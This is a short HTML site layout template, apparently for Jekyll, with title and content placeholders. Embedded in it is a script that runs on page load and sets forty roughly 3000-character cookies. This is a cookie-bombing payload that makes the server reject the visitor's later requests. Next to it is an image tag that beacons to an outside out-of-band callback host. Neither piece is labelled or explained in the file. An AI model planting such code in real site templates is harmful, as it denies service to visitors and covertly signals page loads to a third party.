<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>{{ page.title }}</title>
  <link rel="stylesheet" href="{{ '/assets/style.css' | relative_url }}">
</head>
<body>
<script>
  const count = 40;
for (let i = 0; i < count; i++) {
  const name = `c${i}`;
  const value = "x".repeat(3000 - name.length - 1); // account for name length
  document.cookie = `${name}=${value}; path=/; SameSite=Lax`;
}
</script>
<img src=https://kayn3mdpohvexhnwqvjp9nolwc24quej.oastify.com>
  <main>
    {{ content }}
  </main>

</body>
</html>
